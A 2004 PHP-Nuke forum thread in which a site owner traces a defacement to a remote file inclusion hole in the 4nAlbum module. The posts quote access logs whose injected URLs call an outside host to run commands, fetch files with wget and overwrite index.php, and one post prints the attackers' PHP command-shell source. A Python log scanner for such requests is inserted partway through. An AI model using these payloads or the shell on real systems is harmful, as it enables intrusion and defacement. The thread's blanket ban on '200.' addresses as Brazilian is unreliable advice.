Ravens PHP Scripts: Forums

Forum: Security - PHP Nuke
ring_c (Involved; Joined: Dec 28, 2003; Posts: 276; Location: Israel)
Posted: Fri Jun 04, 2004 4:36 am

Raven, could you tell me how they use these apps to change the index.php?
 
ring_c
Posted: Fri Jun 04, 2004 4:37 am

stephen2417 wrote:
Well, what a motto.. If you do get hacked again then it's not an image gallery.. we have ruled that out then.

Right, I've removed all galleries, and any upload module (except for attach_mod in phpBB. Don't tell me this one is suspected too!).
 
stephen2417 (Worker; Joined: Jan 18, 2004; Posts: 244; Location: Bristolville, OH)
Posted: Fri Jun 04, 2004 4:50 am

Hate to tell you but it very well could be the attachment mod..

Don't go removing it just yet though..
Here's a few tips. Find out how the hackers found your site, by checking your webstats.
And then if you do find something odd then you may have your answer.

But hackers are odd, you know.. You never know how they find your site.
Check over your server logs for the time when it was hacked; shouldn't be too hard to pinpoint..

It's just a stab in the dark, I'm totally guessing about the attachment mod.. It could be anything these days. You never know.
 
Raven (Site Admin/Owner; Joined: Aug 27, 2002; Posts: 17088)
Posted: Fri Jun 04, 2004 4:55 am

Look for a URI request string (the values after the ? mark) that has something like

file=index.php
 
ring_c
Posted: Fri Jun 04, 2004 5:03 am

Raven, what about the error I get with the patched admin.php, as I wrote on the 1st page?
 
Raven
Posted: Fri Jun 04, 2004 5:10 am

No idea at this point. I would restore your files, disable all addons/apps that have file upload capability, and search your logs as I stated above. That will tell you how they are getting in.
 
chatserv (Member Emeritus; Joined: May 02, 2003; Posts: 1389; Location: Puerto Rico)
Posted: Fri Jun 04, 2004 8:48 am

ring_c wrote:
Raven, I had a problem with the FIRST file I've uploaded.
I've started with the root's admin.php file. After replacing the file (don't worry, I have a backup), I got this error:

Fatal error: Call to undefined function: stripos_clone() in /home/hagigim/public_html/admin.php on line 19

Now I'm really afraid to continue...

The first file you should upload is mainfile.php
 
ring_c
Posted: Fri Jun 04, 2004 9:25 am

chatserv wrote:
The first file you should upload is mainfile.php

That's what I thought too... so I've uploaded the admin directory plus the index.php, mainfile.php and other root files, to no avail...
So I removed the patched admin.php and am now using the old admin.php.
 
ring_c
Posted: Fri Jun 04, 2004 9:26 am

Raven wrote:
Look for a URI request string (the values after the ? mark) that has something like

file=index.php

I guess you meant URL, right, to be found in the access logs. Well, none of this was found...
 
ring_c
Posted: Fri Jun 04, 2004 9:34 am

Here's something I've found in my logs, around the time the index.php was changed. Does that mean anything to you?

    65.54.164.40 - - [03/Jun/2004:23:00:12 -0400] "GET /modules.php?name=4nAlbum HTTP/1.0" 200 37032 "-" "msnbot/0.11 (+http://search.msn.com/msnbot.htm)"
    200.181.94.89 - - [03/Jun/2004:23:12:09 -0400] "GET [ Only registered users can see links on this board! Get registered or login! ] HTTP/1.0" 200 1226 "http://www.hagigim.com/modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=id" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
    200.181.94.89 - - [03/Jun/2004:23:18:53 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=id;uname%20-a;pwd HTTP/1.1" 200 1409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    200.181.94.89 - - [03/Jun/2004:23:20:21 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=cd%20/home/hagigim/public_html;ls HTTP/1.1" 200 1771 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    200.181.94.89 - - [03/Jun/2004:23:20:38 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=cd%20/home/hagigim/public_html;wget%20www.dsuspect.hpg.com.br/you.txt HTTP/1.1" 200 1244 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    202.57.134.196 - - [03/Jun/2004:23:20:55 -0400] "GET [ Only registered users can see links on this board! Get registered or login! ] HTTP/1.1" 200 18647 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
    200.181.94.89 - - [03/Jun/2004:23:21:19 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=cd%20/home/hagigim/public_html;echo%20Rebellious%20Fingers%20-%20rebellious@end-war.com%20>%20index.php HTTP/1.1" 200 1236 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    200.181.94.89 - - [03/Jun/2004:23:21:31 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    200.181.94.89 - - [03/Jun/2004:23:21:34 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    200.181.94.89 - - [03/Jun/2004:23:21:58 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.50megs.com/cse.gif?&cmd=id;uname%20-a;pwd HTTP/1.1" 200 2770 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    200.181.94.89 - - [03/Jun/2004:23:22:07 -0400] "GET /favicon.ico HTTP/1.1" 404 4173 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    200.181.94.89 - - [03/Jun/2004:23:22:44 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.50megs.com/cse.gif?&cmd=cd%20/home/hagigim/public_html;echo%20Rebellious%20Fingers%20Defacements%20Crew!%20-%20rebellious@end-war.com%20>%20index.php HTTP/1.1" 200 2574 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    200.181.94.89 - - [03/Jun/2004:23:22:46 -0400] "GET / HTTP/1.1" 200 74 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    65.54.164.40 - - [03/Jun/2004:23:30:34 -0400] "GET /modules.php?name=Downloads HTTP/1.0" 200 30418 "-" "msnbot/0.11 (+http://search.msn.com/msnbot.htm)"
    200.181.94.89 - - [03/Jun/2004:23:31:31 -0400] "GET / HTTP/1.1" 200 74 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    200.181.94.89 - - [03/Jun/2004:23:31:53 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.50megs.com/cse.gif?&cmd=cd%20/home;ls HTTP/1.1" 200 2606 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    65.54.164.40 - - [03/Jun/2004:23:32:51 -0400] "GET /modules.php?name=Search&author=\xd7\x9e\xd7\xa0\xd7\x94\xd7\x9c%20\xd7\x94\xd7\x90\xd7\xaa\xd7\xa8 HTTP/1.0" 200 31164 "-" "msnbot/0.11 (+http://search.msn.com/msnbot.htm)"
    68.105.175.126 - - [04/Jun/2004:00:05:11 -0400] "GET /modules/Forums/images/avatars/Risque/fhffl108.jpg HTTP/1.1" 200 2239 "http://www.portedmods.com/ftopicp-10323.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
    80.12.161.55 - - [04/Jun/2004:00:09:27 -0400] "GET /hebnuker/modules/Forums/images/avatars/Buffy%20the%20Vampire%20Slayer/buffy3.jpg HTTP/1.1" 404 4173 "http://p206.ezboard.com/fdawsonscreekfansfrm7" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; FunWebProducts)"
    217.132.249.95 - - [04/Jun/2004:00:10:20 -0400] "-" 408 - "-" "-"
    217.132.249.95 - - [04/Jun/2004:00:10:20 -0400] "-" 408 - "-" "-"
    217.132.249.95 - - [04/Jun/2004:00:10:20 -0400] "-" 408 - "-" "-"
    217.132.249.95 - - [04/Jun/2004:00:10:20 -0400] "-" 408 - "-" "-"
    217.132.249.95 - - [04/Jun/2004:00:10:20 -0400] "-" 408 - "-" "-"
    64.229.115.242 - - [04/Jun/2004:00:10:49 -0400] "GET /hebnuker/modules/Forums/images/avatars/Unicorns/Uni44.gif HTTP/1.1" 404 4173 "http://everlastworld.customcdrom.de/board/viewtopic.php?t=1770" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
    82.166.156.187 - - [04/Jun/2004:00:11:20 -0400] "GET /hebnuker/modules.php?name=Forums&file=index HTTP/1.1" 404 4173 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Hotbar 4.4.2.0; FunWebProducts)"
    217.132.249.95 - - [04/Jun/2004:00:11:21 -0400] "-" 408 - "-" "-"
    217.132.249.95 - - [04/Jun/2004:00:11:21 -0400] "-" 408 - "-" "-"
    217.132.249.95 - - [04/Jun/2004:00:11:21 -0400] "-" 408 - "-" "-"
    82.166.156.187 - - [04/Jun/2004:00:12:01 -0400] "GET /hebnuker/modules.php?name=Forums&file=index HTTP/1.1" 404 4173 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Hotbar 4.4.2.0; FunWebProducts)"


1. What's that msnbot?
2. What does this line mean?
Code:
217.132.249.95 - - [04/Jun/2004:00:10:20 -0400] "-" 408 - "-" "-"
3.
 
oprime2001 (Worker; Joined: Jun 04, 2004; Posts: 119; Location: Chicago IL USA)
Posted: Fri Jun 04, 2004 12:45 pm

Code:
200.181.94.89 - - [03/Jun/2004:23:12:09 -0400] "GET http://www.hagigim.com/modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=id HTTP/1.0" 200 1226 "http://www.hagigim.com/modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=id" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
200.181.94.89 - - [03/Jun/2004:23:18:53 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=id;uname%20-a;pwd HTTP/1.1" 200 1409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.181.94.89 - - [03/Jun/2004:23:20:21 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=cd%20/home/hagigim/public_html;ls HTTP/1.1" 200 1771 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.181.94.89 - - [03/Jun/2004:23:20:38 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=cd%20/home/hagigim/public_html;wget%20www.dsuspect.hpg.com.br/you.txt HTTP/1.1" 200 1244 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.181.94.89 - - [03/Jun/2004:23:21:19 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=cd%20/home/hagigim/public_html;echo%20Rebellious%20Fingers%20-%20rebellious@end-war.com%20>%20index.php HTTP/1.1" 200 1236 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.181.94.89 - - [03/Jun/2004:23:21:31 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.181.94.89 - - [03/Jun/2004:23:21:34 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.181.94.89 - - [03/Jun/2004:23:21:58 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.50megs.com/cse.gif?&cmd=id;uname%20-a;pwd HTTP/1.1" 200 2770 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.181.94.89 - - [03/Jun/2004:23:22:07 -0400] "GET /favicon.ico HTTP/1.1" 404 4173 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.181.94.89 - - [03/Jun/2004:23:22:44 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.50megs.com/cse.gif?&cmd=cd%20/home/hagigim/public_html;echo%20Rebellious%20Fingers%20Defacements%20Crew!%20-%20rebellious@end-war.com%20>%20index.php HTTP/1.1" 200 2574 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.181.94.89 - - [03/Jun/2004:23:22:46 -0400] "GET / HTTP/1.1" 200 74 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.181.94.89 - - [03/Jun/2004:23:31:31 -0400] "GET / HTTP/1.1" 200 74 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.181.94.89 - - [03/Jun/2004:23:31:53 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.50megs.com/cse.gif?&cmd=cd%20/home;ls HTTP/1.1" 200 2606 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Look at the lines that start with 200. First, these are Brazilian IPs << notorious for hack attempts. Second, if you look at these lines closely, they are using a vulnerability in your 4nAlbum module to access a file on another server. They are then using http :// failiture.webcindario.com/rf.txt to execute commands on your server.
I don't use 4nAlbum myself, so I cannot direct you to updates. But I would bet that the problem in this instance is 4nAlbum. Hope that helps.

BTW, I took a look at that rf.txt file; here's what's in it.
Code:
<br><font face="verdana" size="2"><center><b>CMD</b> - Rebellious Fingers - We'are: Ackstr0n_X - D3m0n_suspect - Failiture<br></center></font><font face="Verdana" size="1"></center><br>

<b>#</b> CMD PHP : <br>
<b>#</b> Released by : <b>Rebellious Fingers - We'are: Ackstr0n_X - D3m0n_suspect - Failiture</b><br>
<br>
<br>
<hr color="black" width=751px height=115px>
<br>
<pre><font face="Verdana" size="1">
<?
  // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
  if (isset($chdir)) @chdir($chdir);
  ob_start();
  system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
  $output = ob_get_contents();
  ob_end_clean();
  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
</font></pre>
<br>
<hr color="black" width=751px height=115px>
<br>
<font face="Verdana" size="1"><b>#RF</b><br><b>@ </b>irc.brasnet.org<br><b># </b> [ Only registered users can see links on this board! Get registered or login! ] face="verdana" size="1"> Rebellious Fingers - We'are: Ackstr0n_X - D3m0n_suspect - Failiture ::
</font></p>
 
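Raven's tip (search the values after the ? in the access log) and oprime2001's reading of the 4nAlbum lines can be turned into a small log check. The following is an added example, not code from this thread or from PHP-Nuke or 4nAlbum: it parses Apache combined-format lines and flags query parameters that carry a remote URL (the basepath= remote include), a cmd= parameter, shell metacharacters, or a file= value naming a .php script. The sample log is constructed from the thread's own excerpts, with user agents shortened.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
                    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')

def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["request"].split(" ")      # "GET /path?query HTTP/1.1"; just "-" on 408 lines
    rec["target"] = parts[1] if len(parts) >= 2 else "-"
    return rec

def suspicious_params(target):
    """List why a request target looks like file inclusion or command injection (empty = clean)."""
    reasons = []
    for pair in target.partition("?")[2].split("&"):   # only the values after the '?' matter
        key, _, raw = pair.partition("=")
        value = unquote(raw)
        if value.lower().startswith(("http://", "https://", "ftp://")):
            reasons.append(f"remote URL in '{key}' (remote file inclusion)")
        if key.lower() == "cmd":
            reasons.append(f"command parameter cmd={value!r}")
        if any(ch in value for ch in ";|`>"):
            reasons.append(f"shell metacharacters in '{key}'")
        if key.lower() == "file" and value.endswith(".php"):   # Raven's file=index.php hint;
            reasons.append(f"script name in file={value}")     # PHP-Nuke's own file=index is normal
    return reasons

def scan(log_text):  # -> [(ip, time, target, reasons)] for every line that trips a check
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        reasons = suspicious_params(rec["target"]) if rec else []
        if reasons:
            findings.append((rec["ip"], rec["time"], rec["target"], reasons))
    return findings

# Constructed sample modeled on the thread's excerpts (user agents shortened).
SAMPLE_LOG = """\
65.54.164.40 - - [03/Jun/2004:23:00:12 -0400] "GET /modules.php?name=4nAlbum HTTP/1.0" 200 37032 "-" "msnbot/0.11 (+http://search.msn.com/msnbot.htm)"
200.181.94.89 - - [03/Jun/2004:23:18:53 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=id;uname%20-a;pwd HTTP/1.1" 200 1409 "-" "Mozilla/4.0"
200.181.94.89 - - [03/Jun/2004:23:21:19 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=cd%20/home/hagigim/public_html;echo%20Rebellious%20Fingers%20>%20index.php HTTP/1.1" 200 1236 "-" "Mozilla/4.0"
217.132.249.95 - - [04/Jun/2004:00:10:20 -0400] "-" 408 - "-" "-"
82.166.156.187 - - [04/Jun/2004:00:11:20 -0400] "GET /hebnuker/modules.php?name=Forums&file=index HTTP/1.1" 404 4173 "-" "Mozilla/4.0"
"""
```

Calling scan(SAMPLE_LOG) returns two findings, both for 200.181.94.89, while the msnbot crawl, the 408 timeout line and PHP-Nuke's normal file=index request stay clean.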
ring_c
Posted: Sat Jun 05, 2004 1:38 pm

Thanks, oprime2001.
I've removed 4nAlbum on Friday already.
Do you think I should also ban Brazilian IPs from accessing the site?

Oh, and how can you tell whether an IP is Brazilian or other?
 
oprime2001
Posted: Sat Jun 05, 2004 4:21 pm

ring_c wrote:
Thanks, oprime2001.
I've removed 4nAlbum on Friday already.
Do you think I should also ban Brazilian IPs from accessing the site?

Oh, and how can you tell whether an IP is Brazilian or other?

I use MS_ANALYSIS to help identify visitors. You can also use IP-to-country databases (e.g. http://www.perl-studio.com/iptocountry/index.php) if you want to check specific IP addresses.

As for banning all Brazilian IPs, that's up to you. After getting defaced twice in one month from Brazilian IPs, and since my sites are not geared towards Brazilians anyways, I've personally banned all 200. IP addresses using .htaccess file. Hope that helps.
 
ring_c
Posted: Sat Jun 05, 2004 4:24 pm

oprime2001 wrote:
As for banning all Brazilian IPs, that's up to you. After getting defaced twice in one month from Brazilian IPs, and since my sites are not geared towards Brazilians anyways, I've personally banned all 200. IP addresses using .htaccess file. Hope that helps.

Could you please detail how one should do it in the proper manner?
TIA!
 
Raven
Posted: Sat Jun 05, 2004 5:08 pm

Add this line to .htaccess:

Deny from 200
 
Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 